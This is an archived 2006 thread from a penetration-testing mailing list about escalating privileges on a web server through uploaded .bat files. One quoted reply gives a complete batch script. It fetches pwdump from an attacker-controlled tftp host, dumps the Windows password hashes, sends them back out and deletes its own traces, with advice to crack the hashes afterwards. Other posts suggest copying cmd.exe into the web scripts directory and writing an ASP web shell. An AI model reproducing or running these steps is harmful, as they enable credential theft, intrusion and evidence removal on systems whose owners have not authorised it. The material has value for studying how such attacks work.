Penetration Testing mailing list archives
RE: privelege escalation with .bat files
From: "Ben Greenberg" <bengreenb () hotmail com>
Date: Thu, 27 Apr 2006 18:10:20 +0000
One quick comment. My problem was that I couldn't execute the bat files, and was looking to see if I could post to them(i finally found a seperate solution). My suggestion to anyone who CAN execute bat files is the following, even simpler solution, to getting a command prompt:
copy C:/windows/system32/cmd.exe C:/inetpub/scripts/
From there, you can post commands to cmd.exe through the method explained in
the paper "One way web hacking". Peace, Urthogie
From: Rich <rlandrig () optonline net> To: 'Maudite' <maudite.mlrl () gmail com>, pen-test () securityfocus com Subject: RE: privelege escalation with .bat files Date: Thu, 27 Apr 2006 09:05:26 -0400 Not only will I not laugh,, I thank you for sharing this with all of us in this group. Simplicity in itself is excellence, and you have shown a very elegant method to us all that now, we can utilize with efficiency. Thanks again rich -----Original Message----- From: Maudite [mailto:maudite.mlrl () gmail com] Sent: Wednesday, April 26, 2006 9:50 PM To: pen-test () securityfocus com Subject: RE: privelege escalation with .bat files Keep it simple. If you can upload and execute a .bat, I use the following a lot withmetasploit and other items I can get on a machine with. I steal the passwordfile with pwdump. If you want to upload other items just edit the following for what you want to upload (nc, adduser, shell code, root kit...). Save yourself time and have the script start and stop everything.Run a tftp server on your attack machine. I use VM ware a lot so I will havea linux iso in vm and win running as the base. So I have been using tftpd32g. Upload and execute the following. (not a windows guy don't laugh at my simple bat) Winpassword.bat _BEGIN call tftp -i [YOUR attack machine IP HERE] pwdump2.exe call tftp -i [YOUR attack machine IP HERE] GET samdump.dll call pwdump2.exe >password.txt call tftp -i [YOUR attack machine IP HERE] PUT password.txt call del /F pwdump2.exe call del /F samdump.dll call del /F password.txt call del /F TFT* call del /F winpassword.bat call cls _END tftpd is on most boxes. This one uploads, steals the password file (dump then download), thendeletes itself and ends. On and off in seconds. Then use John/l0pht/rainbowsto pop the passwords. Login. - Maudite maudite.mutantlogic.net This must mean something to some one: CISSP/CEH/CISA/..... -----Original Message----- From: Michael Hendrickx [mailto:michael () scanit net] Sent: Wednesday, April 26, 2006 12:58 AM To: pen-test () securityfocus com Subject: Re: privelege escalation with .bat files> However, its also set up to deny copying (or renaming to) of the following> file extensions .asp, .com, .cmd, .exe, and .dll. Interestingly, it does > allow .bat files to be written onto the server. Can't you make a .ASP file through the bat file? (echo "<%" > file.asp). When the bat is executed, it's -I think- done locally, and the ASP file can be created.. Then you can make a knock-off of aspcmd.asp or something. Just a thought, Michael -- Michael Hendrickx, CISSP, SCTA Sr Security Engineer Scanit FZ / LLC http://www.scanit.net ********************************************************************** This e-mail and attached files are confidential. If you are not the designated recipient, any disclosure, reproduction, copying, distribution, or other dissemination or use of this communication is strictly prohibited. If you have received this transmission in error please notify the sender immediately and then delete this e-mail. ********************************************************************** ---------------------------------------------------------------------------- -- This List Sponsored by: Cenzic Concerned about Web Application Security? Why not go with the #1 solution - Cenzic, the only one to win the Analyst's Choice Award from eWeek. As attacks through web applications continue to rise, you need to proactively protect your applications from hackers. Cenzic has the most comprehensive solutions to meet your application security penetration testing and vulnerability management needs. You have an option to go with a managed service (Cenzic ClickToSecure) or an enterprise software (Cenzic Hailstorm). Download FREE whitepaper on how a managed service can help you: http://www.cenzic.com/news_events/wpappsec.php And, now for a limited time we can do a FREE audit for you to confirm your results from other product. Contact us at request () cenzic com for details. ---------------------------------------------------------------------------- -- ---------------------------------------------------------------------------- -- This List Sponsored by: Cenzic Concerned about Web Application Security? Why not go with the #1 solution - Cenzic, the only one to win the Analyst's Choice Award from eWeek. As attacks through web applications continue to rise, you need to proactively protect your applications from hackers. Cenzic has the most comprehensive solutions to meet your application security penetration testing and vulnerability management needs. You have an option to go with a managed service (Cenzic ClickToSecure) or an enterprise software (Cenzic Hailstorm). Download FREE whitepaper on how a managed service can help you: http://www.cenzic.com/news_events/wpappsec.php And, now for a limited time we can do a FREE audit for you to confirm your results from other product. Contact us at request () cenzic com for details. ---------------------------------------------------------------------------- -- -- No virus found in this incoming message. Checked by AVG Free Edition. Version: 7.1.385 / Virus Database: 268.4.6/324 - Release Date: 4/25/2006 ------------------------------------------------------------------------------ This List Sponsored by: Cenzic Concerned about Web Application Security? Why not go with the #1 solution - Cenzic, the only one to win the Analyst'sChoice Award from eWeek. As attacks through web applications continue to rise, you need to proactively protect your applications from hackers. Cenzic has themost comprehensive solutions to meet your application security penetration testing and vulnerability management needs. You have an option to go with a managed service (Cenzic ClickToSecure) or an enterprise software (Cenzic Hailstorm). Download FREE whitepaper on how a managed service can help you: http://www.cenzic.com/news_events/wpappsec.php And, now for a limited time we can do a FREE audit for you to confirm your results from other product. Contact us at request () cenzic com for details. ------------------------------------------------------------------------------
------------------------------------------------------------------------------ This List Sponsored by: CenzicConcerned about Web Application Security? Why not go with the #1 solution - Cenzic, the only one to win the Analyst's Choice Award from eWeek. As attacks through web applications continue to rise, you need to proactively protect your applications from hackers. Cenzic has the most comprehensive solutions to meet your application security penetration testing and vulnerability management needs. You have an option to go with a managed service (Cenzic ClickToSecure) or an enterprise software (Cenzic Hailstorm). Download FREE whitepaper on how a managed service can help you: http://www.cenzic.com/news_events/wpappsec.php And, now for a limited time we can do a FREE audit for you to confirm your results from other product. Contact us at request () cenzic com for details.
------------------------------------------------------------------------------
Current thread:
- privelege escalation with .bat files Ben Greenberg (Apr 24)
- Re: privelege escalation with .bat files bookworm (Apr 25)
- Re: privelege escalation with .bat files Ben Greenberg (Apr 25)
- Re: privelege escalation with .bat files Christian Bauer (Apr 25)
- <Possible follow-ups>
- Re: privelege escalation with .bat files joshuaperrymon (Apr 25)
- Re: privelege escalation with .bat files Michael Hendrickx (Apr 26)
- RE: privelege escalation with .bat files Maudite (Apr 26)
- RE: privelege escalation with .bat files Rich (Apr 27)
- Re: privelege escalation with .bat files Maudite MLRL (Apr 27)
- RE: privelege escalation with .bat files Ben Greenberg (Apr 27)
- Re: privelege escalation with .bat files Maudite MLRL (Apr 28)
- RE: privelege escalation with .bat files Maudite (Apr 26)
- Re: privelege escalation with .bat files bookworm (Apr 25)
- Re: privelege escalation with .bat files Nicolas RUFF (Apr 28)